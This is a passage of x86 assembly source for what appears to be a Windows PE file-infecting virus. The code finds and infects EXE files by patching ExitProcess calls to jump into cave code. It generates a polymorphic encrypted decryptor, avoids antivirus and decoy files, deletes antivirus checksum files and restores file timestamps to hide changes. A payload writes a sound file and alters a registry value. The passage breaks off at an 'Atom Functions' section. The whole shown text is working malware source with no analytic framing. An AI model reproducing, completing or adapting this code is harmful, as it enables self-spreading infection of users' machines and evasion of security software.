+fd_ftCreationTime dd 0, 0 +fd_ftLastAccessTime dd 0, 0 +fd_ftLastWriteTime dd 0, 0 +fd_nFileSizeHigh dd 0 +fd_nFileSizeLow dd 0 +fd_dwReserved0 dd 0 +fd_dwReserved1 dd 0 +fd_cFileName db 260 dup(0) +fd_cAlternateFileName db 14 dup(0) +WIN32_FIND_DATA ends + +FILETIME struct +ft_dwLowDateTime dd 0 +ft_dwHighDateTime dd 0 +FILETIME ends + + +; -****************- +; PE Header format +; -****************- + +PEHEADER struct + ID dd ? + Machine dw ? + NumberOfSections dw ? + TimeDateStamp dd ? + PointerToSymbolTable dd ? + NumberOfSymbols dd ? + SizeOfOptionalHeader dw ? + Characteristics dw ? +; Optional Header: + MagicNumber dw ? + MajorLinkerVersion db ? + MinorLinkerVersion db ? + SizeOfCode dd ? + SizeOfInitializedData dd ? + SizeOfUninitializedData dd ? + AddressOfEntryPoint dd ? + BaseOfCode dd ? + BaseOfData dd ? + ImageBase dd ? + SectionAlignment dd ? + FileAlignment dd ? + MajorOperatingSystemVersion dw ? + MinorOperatingSystemVersion dw ? + MajorImageVersion dw ? + MinorImageVersion dw ? + MajorSubsystemVersion dw ? + MinorSubsystemVersion dw ? + Reserved1 dd ? + SizeOfImage dd ? + SizeOfHeaders dd ? + CheckSum dd ? + Subsystem dw ? + DllCharacteristics dw ? + SizeOfStackReserve dd ? + SizeOfStackCommit dd ? + SizeOfHeapReserve dd ? + SizeOfHeapCommit dd ? + LoaderFlags dd ? + NumberOfRvaAndSizes dd ? + DataDirectory dd 20 dup (?) +PEHEADER ends + +; Data Directory +; -------------- +DIR_EXPORT_TABLE equ 0 +DIR_IMPORT_TABLE equ 1 +DIR_RESOURCE_TABLE equ 2 +DIR_EXCEPTION_TABLE equ 3 +DIR_SECURITY_TABLE equ 4 +DIR_FIXUP_TABLE equ 5 +DIR_DEBUG_TABLE equ 6 +DIR_IMAGE_DESCRIPTION equ 7 +DIR_MACHINE_SPECIFIC_DATA equ 8 +DIR_THREAD_LOCAL_STORAGE equ 9 +DIR_LOAD_CONFIG equ 10 +DIR_BOUND_IMPORT equ 11 +DIR_IMPORT_ADDRESS_TABLE equ 12 + + +; -*******************- +; Export Table format +; -*******************- + +EXPORTHEADER struct + UnusedCharacteristics dd ? + DateTimeStamp dd ? + MajorVersion dw ? + MinorVersion dw ? + Name dd ? + Base dd ? + NumberOfFunctions dd ? + NumberOfNames dd ? + AddressOfFunctions dd ? + AddressOfNames dd ? + AddressOfNameOrdinals dd ? +EXPORTHEADER ends + + +; -**************************- +; Section Table Entry format +; -**************************- + +SECTION struct + sec_Name db 8 dup (?) + sec_VirtualSize dd ? + sec_VirtualAddress dd ? + sec_SizeOfRawData dd ? + sec_PointerToRawData dd ? + sec_PointerToRelocations dd ? + sec_PointerToLinenumbers dd ? + sec_NumberOfRelocations dw ? + sec_NumberOfLineNumbers dw ? + sec_Characteristics dd ? +SECTION ends + +; Section Characteristics flags +; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC_CODE equ 00000020h +SEC_INITIALIZED_DATA equ 00000040h +SEC_UNINITIALIZED_DATA equ 00000080h +SEC_NO_CACHE equ 04000000h +SEC_NOT_PAGEABLE equ 08000000h +SEC_SHARED equ 10000000h +SEC_EXECUTABLE equ 20000000h +SEC_READ equ 40000000h +SEC_WRITE equ 80000000h + + +; -*******************- +; Import Table format +; -*******************- + +IMPORTTABLE struct + imp_Characteristics dd ? + imp_DateTimeStamp dd ? + imp_ForwarderChain dd ? + imp_Name dd ? + imp_FirstThunk dd ? +IMPORTTABLE ends + + + +; ************************************************************************ +; Data Segment (empty) +; ************************************************************************ +.data +dummy db 0 + + + + + +; ************************************************************************ +; +; Code Segment +; +; ************************************************************************ + + +.code +VIRUSTOTALSIZE equ offset VirusEnd - offset VirusStart +VIRUSCODESIZE equ offset VirusInitEnd - offset VirusStart +filesize equ 7045 +BakaFileSize equ 8 + + +HOST: + xor ebp, ebp + call GetModuleHandleA, offset nKernel32 + jmp short SkipInFirstGeneration + +VirusStart: + call Get_Delta +Get_Delta: + pop ebp + sub ebp, offset Get_Delta + + lea eax, nKernel32+ebp + push eax + dw 15FFh ; Call [var containing offset GetModuleHandle] +GetModHandleAddy dd 0 + +SkipInFirstGeneration: +;-*********************************- +; Get other function addresses from +; the export table of Kernel32.dll +;-*********************************- +GetFunctions: + mov ebx, dword ptr [eax+3Ch] ; RVA of PE Header + mov ebx, dword ptr [ebx+eax].DataDirectory[0] + + mov ecx, dword ptr [ebx+eax].NumberOfNames ; Number of Names + mov NumOfNames+ebp, ecx + + xor ecx, ecx ; Currently at Name 1 + mov edi, dword ptr [ebx+eax].AddressOfNames ; Address of Names + mov edx, dword ptr [ebx+eax].AddressOfFunctions ; RVAs of functions + add edx, eax + mov ebx, dword ptr [ebx+eax].AddressOfNameOrdinals ; Ordinals + add ebx, eax +FindAddress: + mov esi, dword ptr [edi+eax] + add esi, eax + push edi + lea edi, nGetProcAddr+ebp + push ecx + mov ecx, 15 + repz cmpsb + pop ecx + pop edi + jz short Match + add edi, 4 + inc ecx + cmp ecx, NumOfNames+ebp + jnge FindAddress + +OhShitFailImport: + dw 15FFh ; Call [var containing offset ExitProcess] +EmergencyExitAddy dd 0 ; (exit value should be on stack from host) + +Match: + movzx ecx, word ptr [ebx+2*ecx] + mov ecx, dword ptr [edx+4*ecx] + add ecx, eax + + mov ebx, eax + mov _GetProcAddress+ebp, ecx +; GetProcAddress is now in ecx.... + +; Now import the rest of the needed functions + lea esi, InfFunctions+ebp + lea edi, InfDest+ebp +InfGetFuncLoop: + lodsb + movzx ecx, al + jecxz InfImpDone + push esi + add esi, ecx + call _GetProcAddress+ebp, ebx + or eax,eax + jz OhShitFailImport + stosd + jmp InfGetFuncLoop +InfImpDone: + + call LoadSFC ; Load SFC Library if exists + db 'sfc.dll',0 +LoadSFC: + call _LoadLibraryA+ebp + mov SFCLib+ebp, eax + or eax,eax + jz short NoSFCdll ; Probably 95 or 98 + call PushSFCfunc + db 'SfcIsFileProtected',0 +PushSFCfunc: + call _GetProcAddress+ebp, eax +NoSFCdll: + mov _SfcIsFileProtected+ebp, eax + + + lea eax, DirBuf+ebp + call _GetCurrentDirectoryA+ebp, 256, eax + lea eax, RootDir+ebp + call _SetCurrentDirectoryA+ebp, eax + lea eax, CurrentTime+ebp + call _GetSystemTimeAsFileTime+ebp, eax + ror CurrentTime.ft_dwLowDateTime+ebp, 5 ; Get rid of ending 0s + +;>>>>>----------------------------------------------------------------<<<<< + +; ****** Payload start here ****** +; (makes baka.wav play when a program crashes) + test CurrentTime.ft_dwLowDateTime+ebp, 7 ; 1 in 8 times + jnz SearchNewDir + + lea edi, buffer+ebp + call _GetWindowsDirectoryA+ebp, edi, MAX_PATH + push edi + add edi, eax + lea esi, bakafile+ebp + push 10 + pop ecx + rep movsb + pop edi + mov esi, ecx + + call _CreateFileA+ebp, edi, GENERIC_READ+GENERIC_WRITE, esi, esi, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, esi + or eax, eax + js ExitPayload + push eax ; Push FileHandle + call _CreateFileMappingA+ebp, eax, esi, PAGE_READWRITE, esi, filesize, esi + or eax, eax + je CloseAndExitPayload + call _MapViewOfFile+ebp, eax, FILE_MAP_WRITE, esi, esi, esi + push eax ; Push Memory Addy + + xchg eax, edi + lea esi, BakaWav+ebp + mov edx, filesize + push ebp + call decode + pop ebp + + call PushRegLibName ; Load the Reg* functions + db 'ADVAPI32',0 +PushRegLibName: + call _LoadLibraryA+ebp + push eax + + xchg eax, ebx + lea esi, RegFunctions+ebp + lea edi, RegFuncDest+ebp + call FillImports + jc short FreeLibAndExit + lea eax, RegKey+ebp + lea ecx, RegHnd+ebp + call _RegOpenKeyA+ebp, HKEY_USERS, eax, ecx + mov ebx, RegHnd+ebp + push ebx + + lea eax, RegKey+ebp + lea ecx, bakafile+1+ebp + call _RegSetValueA+ebp, HKEY_USERS, eax, REG_SZ, ecx, BakaFileSize +CloseKeyAndExit: + call _RegCloseKey+ebp +FreeLibAndExit: + call _FreeLibrary+ebp +CloseAndExitPayload: + call _UnmapViewOfFile+ebp + call _CloseHandle+ebp +ExitPayload: + call _CloseHandle+ebp +; ****** Payload end here ****** + + +SearchNewDir: + lea ecx, FileMaskAny+ebp + lea edx, FindFile+ebp + call _FindFirstFileA+ebp, ecx, edx + mov SearchHnd+ebp, eax + cmp eax, INVALID_HANDLE_VALUE + je ExitProgram + + xor eax, eax + mov NumInfected+ebp, al + mov AVCRCFlag+ebp, al + mov NonExeCount+ebp, eax + mov DirCount+ebp, eax + mov ExeGoodCount+ebp, eax + mov ExeBadCount+ebp, eax + mov ExeSizesPtr+ebp, eax + +ScanDirLoop: + call GetShortFileName + + test FindFile.fd_dwFileAttributes+ebp, FILE_ATTRIBUTE_DIRECTORY + jnz ScanDirStats + +; ************************ +; Check if File is an .EXE +; ************************ + mov edi, esi + mov al, 0 + mov ecx, 255 ; (13 should be enough, but if long...) + repnz scasb + cmp dword ptr [edi-5], 'EXE.' + jne IncNonExeCount + +; ***************************** +; Check if File is not known AV +; ***************************** + lea edi, AVNames+ebp ; Check if AV - load names +CheckVsAV: + movzx ecx, byte ptr [edi] ; Load length of name + inc edi ; skip past length byte + or ecx,ecx ; Is length zero? + jz short NotAVName ; Yes - passed AV check + push esi ; Save Filename + repz cmpsb ; Compare + pop esi ; Restore FileName + jz AbortDir ; Oh oh - match (skip dir) + add edi, ecx ; Goto next AV Name + jmp CheckVsAV +NotAVName: + +; ******************* +; Possible Goat File? +; ******************* + + call ExeTest + jc IncExeBadCount + inc ExeGoodCount+ebp + + mov ecx, ExeSizesPtr+ebp ; Store file sizes for analyses + cmp ecx, MAXEXEPERDIR + je short GetNextScanFile + mov eax, FindFile.fd_nFileSizeLow+ebp + mov [offset ExeSizes + 4*ecx + ebp], eax + inc ExeSizesPtr+ebp + +GetNextScanFile: + lea ecx, FindFile+ebp + call _FindNextFileA+ebp, SearchHnd+ebp, ecx + or eax, eax + jnz ScanDirLoop + call _FindClose+ebp, SearchHnd+ebp + +; Check if probable goat directory + mov eax, ExeGoodCount+ebp + mov ebx, ExeBadCount+ebp + mov ecx, NonExeCount+ebp + + cmp eax, 0 + je GotoNextDir + + cmp ebx, MAXBADEXE ; Too many possible goats? + ja GotoNextDir + cmp eax, ebx ; More bad EXEs than goods? + jb GotoNextDir + add ebx, eax ; Too Many EXEs? + cmp ebx, MAXEXEPERDIR + ja GotoNextDir + cmp ebx, ecx ; Too high a ratio of EXEs? + ja GotoNextDir + + cmp eax, MAXSAMESIZE + jbe short FindExes + mov ecx, ExeSizesPtr+ebp ; Bubble Sort Exe Sizes + dec ecx + lea edi, ExeSizes+ebp + xor ebx, ebx +BubbleLoop1: + lea edx, [ebx+1] +BubbleLoop2: + mov eax, [edi + 4*ebx] + cmp eax, [edi + 4*edx] + jbe short BubbleNoSwap + xchg [edi + 4*edx], eax + mov [edi + 4*ebx], eax +BubbleNoSwap: + inc edx + cmp edx, ecx + jbe BubbleLoop2 + inc ebx + cmp ebx, ecx + jb BubbleLoop1 + + xor ebx, ebx ; Num of same increments + xor edx, edx ; Num of files with same size as another + xor esi, esi ; Size of last increment (init to -1) + dec esi +ExeSizeLoop: + mov eax, [edi+4*ecx] + sub eax, [edi+4*ecx-4] + jnz short ExesNotSameSize + inc edx + cmp edx, MAXSAMESIZE-1 + jae GotoNextDir + jmp short NoSizePattern +ExesNotSameSize: + xor edx, edx + xchg eax, esi + cmp eax, esi + jne short NoSizePattern + inc ebx +NoSizePattern: + loop ExeSizeLoop + cmp ebx, MAXSIZEPATTERN + jae GotoNextDir + +FindExes: + lea ecx, FileMaskExe+ebp + lea edx, FindFile+ebp + call _FindFirstFileA+ebp, ecx, edx + mov SearchHnd+ebp, eax +FindExeLoop: + + call GetShortFileName + call ExeTest + jc short FindNextExe + + lea eax, FindFile.fd_cFileName+ebp + call _SetFileAttributesA+ebp, eax, FILE_ATTRIBUTE_NORMAL + or eax, eax ; Set Attributes OK? + je short FindNextExe ; No- oh oh. Network? + + push CurrentTime.ft_dwHighDateTime+ebp ; Save seed (rand slow) + shr CurrentTime.ft_dwHighDateTime+ebp, 12 ; Divide by 40 days + call InfectTheFileAlready ; About time, huh? + pop CurrentTime.ft_dwHighDateTime+ebp ; restore seed + + + lea eax, FindFile.fd_cFileName+ebp + call _SetFileAttributesA+ebp, eax, FindFile.fd_dwFileAttributes+ebp + +FindNextExe: + lea ecx, FindFile+ebp + call _FindNextFileA+ebp, SearchHnd+ebp, ecx + or eax, eax + jnz FindExeLoop +AbortDir: + call _FindClose+ebp, SearchHnd+ebp + cmp NumInfected+ebp, 0 ; Exit if done infection + jne RemoveCRCsAndExit + +GotoNextDir: + mov ecx, DirCount+ebp ; Exit if no more dirs + or ecx, ecx + jz ExitProgram + + call randomfast + xor edx, edx + div ecx + inc edx + mov DirCount+ebp, edx + lea ecx, FileMaskAny+ebp + lea edx, FindFile+ebp + call _FindFirstFileA+ebp, ecx, edx + xchg eax, ebx +ChangeDirLoop: + test FindFile.fd_dwFileAttributes+ebp, FILE_ATTRIBUTE_DIRECTORY + jz short FindDir + cmp byte ptr FindFile.fd_cFileName+ebp, '.' + je short FindDir + dec DirCount+ebp + jz short ChangeToDir +FindDir: + lea ecx, FindFile+ebp + call _FindNextFileA+ebp, ebx, ecx + jmp short ChangeDirLoop +ChangeToDir: + call _FindClose+ebp, ebx + lea ecx, FindFile.fd_cFileName+ebp + call _SetCurrentDirectoryA+ebp, ecx + jmp SearchNewDir + +IncExeBadCount: + inc ExeBadCount+ebp + jmp GetNextScanFile + +ScanDirStats: + cmp byte ptr [esi], '.' + je GetNextScanFile + inc DirCount+ebp + jmp GetNextScanFile + +IncNonExeCount: + lea edi, CRCNames+ebp + xor edx, edx + inc edx +CRCNameLoop: + movzx ecx, byte ptr [edi] + inc edi + or ecx, ecx + jz short CRCNamePass + push esi + repz cmpsb + pop esi + jz short CRCNameFail + add edi, ecx + shl edx, 1 + jmp CRCNameLoop +CRCNameFail: + or AVCRCFlag+ebp, dl + jmp short ExitIncNonExeCount +CRCNamePass: + inc NonExeCount+ebp +ExitIncNonExeCount: + jmp GetNextScanFile + +; Remove any AV CRCs.... +RemoveCRCsAndExit: + lea edi, CRCNames+ebp + xor esi, esi + inc esi +RemoveAVCRCs: + movzx ebx, byte ptr [edi] + or ebx, ebx + jz short ExitProgram + inc edi + test dword ptr AVCRCFlag+ebp, esi + jnz short DeleteAVCRC +NextCRCRemove: + shl esi, 1 + add edi, ebx + jmp RemoveAVCRCs +DeleteAVCRC: + call _SetFileAttributesA+ebp, edi, FILE_ATTRIBUTE_NORMAL + call _DeleteFileA+ebp, edi + jmp NextCRCRemove + +ExitProgram: + mov ecx, SFCLib+ebp ; Free SFC lib if loaded + jecxz NoSFCFreeLib + call _FreeLibrary+ebp, ecx +NoSFCFreeLib: + lea eax, DirBuf+ebp + call _SetCurrentDirectoryA+ebp, eax + call _ExitProcess+ebp, 0 + + +; ******************************** +; esi=short filename from FindFile +; ******************************** +GetShortFileName: + lea esi, FindFile.fd_cAlternateFileName+ebp + cmp byte ptr [esi], 0 ; Sometimes unused - check + jne short GotShortFileName + lea esi, FindFile.fd_cFileName+ebp ; put filename in ds:esi +GotShortFileName: + ret + +; ****************************** +; +; TEST EXE FILE FOR GOAT +; +; ****************************** + +ExeTest: +; ****************************** +; Check if File is not too small +; ****************************** +CheckFileSize: + cmp dword ptr FindFile.fd_nFileSizeLow+ebp, MINHOSTSIZE + jb short ExeTestBad ; File too small? +; **************************** +; Check if File is not too new +; **************************** +CheckFileTime: + mov eax, CurrentTime.ft_dwHighDateTime+ebp + sub eax, 1000h + cmp eax, FindFile.fd_ftLastWriteTime.ft_dwHighDateTime+ebp + jb short ExeTestBad +; ******************************** +; Check if File contains long runs +; of letters or contains numbers. +; ******************************** + mov edi, esi + mov byte ptr LetterCount+ebp, 0 ; Currently run of 0 same chars + mov byte ptr LastLetter+ebp, 0 ; Reset last letter + lea esi, FindFile.fd_cFileName+ebp ; put long filename in ds:esi +letterloop: + lodsb ; load letter + or al,al ; End of filename? Yes - exit. + jz short DoneRunCheck + cmp al, '0' ; Check if it has file has + jb short NextCheck ; numbers in it. If so, skip. + cmp al, '2' + jb short ExeTestBad + cmp al, '4' + jb short NextCheck + cmp al, '9' + jbe short ExeTestBad +NextCheck: + xor bl,bl ; Zero Letter Run counter + cmp LastLetter+ebp, al ; Is same as last letter? + jne short DoneCheck ; Yes - it's ok. + mov bl, LetterCount+ebp ; No? # of letters repeated + inc bx ; increment LetterCount + cmp bl, 2 ; Is this he third same letter? + jae short ExeTestBad ; Yes - fail. Look elsewhere +DoneCheck: + mov LastLetter+ebp, al ; Save last letter + mov LetterCount+ebp, bl ; Save Run count + jmp short letterloop ; Get next letter +DoneRunCheck: + clc + ret +ExeTestBad: + stc + ret + + +;>>>>>----------------------------------------------------------------<<<<< +;********************** + +InfectTheFileAlready: + lea ebx, FindFile.fd_cFileName+ebp + xor edi, edi + mov ecx, _SfcIsFileProtected+ebp ; Is SFC protected? + jecxz NotSFCProtected + call ecx, edi, ebx ; call function if present + or eax, eax + jnz ExitInfector +NotSFCProtected: + call _CreateFileA+ebp, ebx, GENERIC_READ+GENERIC_WRITE, FILE_SHARE_WRITE, edi, OPEN_EXISTING, edi, edi + or eax, eax + js ExitInfector + push eax ; Push FileHandle + call _CreateFileMappingA+ebp, eax, edi, PAGE_READWRITE, edi, edi, edi + or eax, eax + je CloseAndExitInfector + push eax + xchg eax, esi + call _MapViewOfFile+ebp, esi, FILE_MAP_WRITE, edi, edi, edi + push eax ; Push Memory Addy + mov esi, eax + + cmp word ptr [eax], 'ZM' ; Is it an EXE? + jne short InfectableNo + cmp word ptr [eax+18h], 40h ; A windows EXE? + jb short InfectableNo + movzx ecx, word ptr [eax+3Ch] + add eax, ecx + cmp dword ptr [eax], 'EP' ; A PE Exe? + jne short InfectableNo + cmp word ptr [eax].Machine, 14Ch ; Is at least 386+ ? + jb short InfectableNo + cmp word ptr [eax].Machine, 160h ; Is not R3000, etc.? + jae short InfectableNo + cmp word ptr [eax].Subsystem, 2 ; Is Windows file? + jb short InfectableNo ; 2=Windows + cmp word ptr [eax].Subsystem, 3 ; 3=Console (win) + jbe short IsInfectable +InfectableNo: + jmp UnmapAndClose +IsInfectable: + + +; First locate imports: + xchg eax, edi + mov eax, dword ptr [edi].DataDirectory+8 +; Section Table: + call RVA2Addr +ImportLoop: + cmp [eax].imp_Characteristics, 0 + je InfectableNo ; No Kernel Import?!? + xchg eax, edx + mov eax, [edx].imp_Name + call RVA2Addr + cmp dword ptr [eax], 'NREK' + jne short TryNextImport + cmp dword ptr [eax+4], '23LE' + je short FoundKernel +TryNextImport: + lea eax, [edx + size IMPORTTABLE] + jmp ImportLoop + +FoundKernel: ; Now find "ExitProcess & GetModuleHandle" + mov eax, [edx].imp_Characteristics + or eax,eax + jne short HNAExists + mov eax, [edx].imp_FirstThunk +HNAExists: + call RVA2Addr + mov ebx, eax + mov edi, [edx].imp_FirstThunk + xor edx,edx ; Import Flags= 0 - nothing yet + +FindImportFunction: + mov eax, [ebx] + or eax,eax + je short DoneImports ; No more imports + js short NotGetModuleHandle ; Some psycho is loading by ordinal + call RVA2Addr + inc eax + inc eax + xchg eax, edi + + test dl, 1 ; Found ExitProcess Already? + jnz short NotExitProcess + mov ecx, 12 + push esi + push edi + lea esi, nExitProcess+ebp + repz cmpsb + pop edi + pop esi + jne short NotExitProcess + or dl, 1 ; Mark as found + mov ExitProcessRVA+ebp, eax ; Save RVA +NotExitProcess: + test dl, 2 ; Found GetMoguleHandle Already? + jnz short NotGetModuleHandle + mov ecx, 17 + push esi + push edi + lea esi, nGetModuleHandle+ebp + rep cmpsb + pop edi + pop esi + jne short NotGetModuleHandle + or dl, 2 + mov GetModuleHandleRVA+ebp, eax +NotGetModuleHandle: + xchg eax, edi + add ebx, 4 ; Next Function Name + add edi, 4 ; Get Next Function RVA + jmp FindImportFunction + +DoneImports: + cmp dl, 3 ; Found both functions? + jne InfectableNo + + movzx ebx, word ptr [esi+3Ch] + add ebx, esi + mov edi, ebx ; edi= PE Header offset + movzx ecx, [ebx].NumberOfSections + movzx edx, word ptr [ebx].SizeOfOptionalHeader + lea edx, [ebx+edx+18h] + +; Get Last Section + push ecx + push edx + mov eax, [edx].sec_PointerToRawData + mov ebx, edx +LastSectionLoop: + cmp eax, [edx].sec_PointerToRawData + jae short NotLastSection + mov eax, [edx].sec_PointerToRawData + mov ebx, edx +NotLastSection: + add edx, size SECTION + loop LastSectionLoop + mov LastSectionEntryPtr+ebp, ebx + pop edx + pop ecx + +; Get Biggest Writable Data Section + push ecx + push edx + xor eax, eax ; Largest section found so far +DataSectionLoop: + test byte ptr [edx].sec_Characteristics+3, 80h ; Writable section? + jz short NextDataSec + cmp eax, [edx].sec_VirtualSize + jae short NextDataSec + mov eax, [edx].sec_VirtualSize + mov ebx, edx +NextDataSec: + add edx, size SECTION + loop DataSectionLoop + pop edx + pop ecx + + mov DataSectionEntryPtr+ebp, ebx + + cmp eax, VIRUSTOTALSIZE + jnb short DataSectionSizePass + +; *************** +; If Data Size is just a little too small, then bump it up +; *************** + mov ebx, [edi].SectionAlignment + dec ebx + add eax, ebx + not ebx + and eax, ebx + cmp eax, VIRUSTOTALSIZE + jb InfectableNo +DataSectionSizePass: + mov NewVirtualSizeOfData+ebp, eax + +; Find Code Section + xor ebx, ebx +FindCodeSection: + test [edx].sec_Characteristics, SEC_CODE+SEC_EXECUTABLE + jz short NotACodeSection + test byte ptr [edx].sec_Characteristics+3, 80h ; Writable CS? + jnz InfectableNo + or ebx,ebx + jnz InfectableNo + mov ebx, edx +NotACodeSection: + add edx, size SECTION + loop FindCodeSection + +;* Find amount of space at the end of the of the code section. + mov edx, [ebx].sec_PointerToRawData + add edx, esi + cmp [ebx].sec_SizeOfRawData, MINCODESIZE + jb InfectableNo + + +; Figure out the real code size + xor ecx,ecx + mov FoundExitCall+ebp, ecx + mov ecx, [edi].FileAlignment + dec ecx + test [ebx].sec_VirtualSize, ecx + jz short ProbablyTLINK +; Assuming LINK - i.e. Virtual Size gives exact size of CS (not aligned). + mov eax, [ebx].sec_VirtualSize + add edx, eax + push eax + and eax, ecx + inc ecx + sub ecx, eax + pop eax + add eax, [ebx].sec_PointerToRawData + cmp ecx, MINSLACKSPACE + jb InfectableNo +; Now: +; - RVA -done (eax) +; - RawAddy -done (edx) +; - SizeOfSpace -done (ecx) + mov EmptyCodeSecRVA+ebp, eax + mov EmptyCodeSecAddr+ebp, edx + mov EmptyCodeSecSize+ebp, ecx + +; Now we search .text for either: +; - EE 15 (call [address]) +; - FF 25 (jmp [address]) + + mov ecx, [ebx].sec_SizeOfRawData + sub ecx, 5 ; (no need to check last 5 bytes) + push esi + mov eax, [ebx].sec_PointerToRawData + add eax, esi + xchg eax, esi + xor edx, edx ; Loop counter +LinkFindJump: + cmp word ptr [esi+edx], 15FFh + jne short LinkJumpNotFound + + mov eax, dword ptr [esi+edx+2] + sub eax, [edi].ImageBase + cmp eax, ExitProcessRVA+ebp + jne short LinkJumpNotFound + + mov eax, EmptyCodeSecRVA+ebp + sub eax, edx + sub eax, [ebx].sec_VirtualAddress + sub eax, 5 + mov byte ptr [esi+edx], 0E9h ; Write in jump to our code ;-) + mov dword ptr [esi+edx+1], eax + inc FoundExitCall+ebp +LinkJumpNotFound: + inc edx + cmp edx, ecx + jb LinkFindJump + pop esi + jmp HaveCSInfo +ProbablyTLINK: + add edx, [ebx].sec_SizeOfRawData + inc ecx +ScanSpaceBackWard: + dec edx + cmp byte ptr [edx], 0 + jne short FoundActualCode + loop ScanSpaceBackWard + jmp InfectableNo ; Probably Some Packer +FoundActualCode: + add edx, 5 ; edx= Raw Adrress of free space + add ecx, 4 + sub ecx, [edi].FileAlignment + neg ecx ; ecx= size of free space + mov eax, [ebx].sec_VirtualAddress + add eax, [ebx].sec_SizeOfRawData + sub eax, ecx + + cmp ecx, MINSLACKSPACE + jb InfectableNo +; Now: +; - RVA -done (eax) +; - RawAddy -done (edx) +; - SizeOfSpace -done (ecx) + mov EmptyCodeSecRVA+ebp, eax + mov EmptyCodeSecAddr+ebp, edx + mov EmptyCodeSecSize+ebp, ecx + +; Now we search .text for either: +; - EE 15 (call [address]) +; - FF 25 (jmp [address]) + + mov ecx, [ebx].sec_SizeOfRawData + sub ecx, 5 ; (no need to check last 5 bytes) + push esi + mov eax, [ebx].sec_PointerToRawData + add eax, esi + xchg eax, esi + xor edx, edx ; Loop counter +TLinkFindJump: + cmp word ptr [esi+edx], 25FFh + jne short TLinkJumpNotFound + + mov eax, dword ptr [esi+edx+2] + sub eax, [edi].ImageBase + cmp eax, ExitProcessRVA+ebp + jne short TLinkJumpNotFound + mov eax, EmptyCodeSecRVA+ebp + sub eax, edx + sub eax, [ebx].sec_VirtualAddress + sub eax, 5 + mov byte ptr [esi+edx], 0E9h ; Write in jump to our code ;-) + mov dword ptr [esi+edx+1], eax + inc FoundExitCall+ebp +TLinkJumpNotFound: + inc edx + cmp edx, ecx + jb TLinkFindJump + pop esi + +HaveCSInfo: + cmp FoundExitCall+ebp, 0 + je InfectableNo + + mov eax, GetModuleHandleRVA+ebp ; Link to GetModuleHandle + add eax, [edi].ImageBase + mov GetModHandleAddy+ebp, eax + mov eax, ExitProcessRVA+ebp ; Setup emergency escape for + add eax, [edi].ImageBase ; the next generation. + mov EmergencyExitAddy+ebp, eax ; (hopefully never needed) + + push esi + push edi + mov esi, edi + call MakeDecryptor + pop edi + pop esi + + mov edx, DataSectionEntryPtr+ebp ; If link and ds too small, + mov eax, NewVirtualSizeOfData+ebp ; then make it bigger + mov [edx].sec_VirtualSize, eax ; else stay the same + + mov edx, LastSectionEntryPtr+ebp ; Fixup Last Section Sizes + mov ecx, [edi].FileAlignment + mov eax, [edx].sec_SizeOfRawData + mov esi, eax ; esi= size of last section + add eax, VIRUSCODESIZE + push eax + dec ecx + add eax, ecx + not ecx + and eax, ecx ; eax= Aligned raw size of last section + mov [edx].sec_SizeOfRawData, eax + pop eax ; not rounded raw size + vir size + mov ecx, [edi].SectionAlignment + dec ecx + add eax, ecx + not ecx + push ecx + and eax, ecx + mov ecx, [edx].sec_VirtualSize ; Get old size for Image size adjust + mov [edx].sec_VirtualSize, eax ; Save New Section VSize + sub eax, ecx ; Get Size increase + pop ecx ; get Section mask (FFFFF000 usually) + and eax, ecx ; Sec Align total size increase + add [edi].SizeOfImage, eax ; add it to the size + +; Fix: +; - Fix Last Section Size (done above) +; - Fix Code Section Size (probably not needed) +; - Fix up GetModHandleAddy (done above) +; + mov ecx, LastSectionEntryPtr+ebp + mov ebx, [ecx].sec_PointerToRawData + add ebx, esi +;int 3 + mov eax, VIRUSCODESIZE-1 + mov edi, [edi].FileAlignment + add eax, edi + neg edi + and edi, eax + + call _UnmapViewOfFile+ebp ; Handle Already on stack + call _CloseHandle+ebp ; Handle Already on stack + + pop esi ; Get File Handle + push esi ; File Handle back for later + xor eax, eax + call _SetFilePointer+ebp, esi, ebx, eax, FILE_BEGIN + lea eax, PolyedVirus+ebp + lea ecx, BytesWritten+ebp +;int 3 +; call _WriteFile+ebp, esi, eax, VIRUSCODESIZE, ecx, 0 + call _WriteFile+ebp, esi, eax, edi, ecx, 0 + + inc NumInfected+ebp + lea eax, FindFile.fd_ftCreationTime+ebp + lea ecx, FindFile.fd_ftLastAccessTime+ebp + lea edx, FindFile.fd_ftLastWriteTime+ebp + call _SetFileTime+ebp, esi, eax, ecx, edx + jmp short CloseAndExitInfector + +UnmapAndClose: + call _UnmapViewOfFile+ebp ; Handle Already on stack + call _CloseHandle+ebp ; Handle Already on stack +CloseAndExitInfector: + call _CloseHandle+ebp ; Again on Stack +ExitInfector: + ret + + + +;********************** + + + +; Enter +; eax = RVA +; esi = Start Of Memory mapped PE file. +; Leave: +; eax = Mem map Address +RVA2Addr: + push ebx + push edx + push ecx + push esi + push edi + movzx edi, word ptr [esi+3Ch] + add edi, esi + movzx edx, [edi].SizeOfOptionalHeader + movzx ecx, [edi].NumberOfSections + lea edx, [edi+edx+18h] ; Start of Section table + mov ebx, [edx].sec_VirtualAddress + mov esi, [edx].sec_PointerToRawData +SectionLoop1: + cmp ebx, [edx].sec_VirtualAddress + jae short SkipSecLoop1 + cmp eax, [edx].sec_VirtualAddress + jb short SkipSecLoop1 + mov ebx, [edx].sec_VirtualAddress + mov esi, [edx].sec_PointerToRawData +SkipSecLoop1: + add edx, size SECTION + loop SectionLoop1 + sub eax, ebx + add eax, esi + pop edi + pop esi + add eax, esi + pop ecx + pop edx + pop ebx + ret + + +MakeDecryptor: + lea edi, PolyedVirus+ebp + mov PolySizeCount+ebp, edi ; Counter for number of bytes used. + mov StackRestore+ebp, esp +if DEBUGENTRY + mov al, 0CCh + stosb +endif + + call SelectRegs2 + call CreateInitCode + call MarkLoop + call CreateLoad + call CreateEncryption + call CreateAddInECX + call CreateStore + call CreateLoop + call CreateGotoVirus +FinishedAlgorithm: + + mov esi, PolySizeCount+ebp + sub edi, esi + cmp edi, EmptyCodeSecSize+ebp + ja short MakeDecryptor + mov ecx, edi + mov edi, EmptyCodeSecAddr+ebp + push esi + rep movsb + pop edi + + lea esi, VirusStart+ebp + mov ecx, VIRUSCODESIZE +EncryptVirus2: + lodsb + call PolyEncryptPtr+ebp + stosb + loop EncryptVirus2 + ret + + + +MakePolyError: + mov esp, StackRestore+ebp + jmp MakeDecryptor + + + + +; *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +; Atom Functions +; 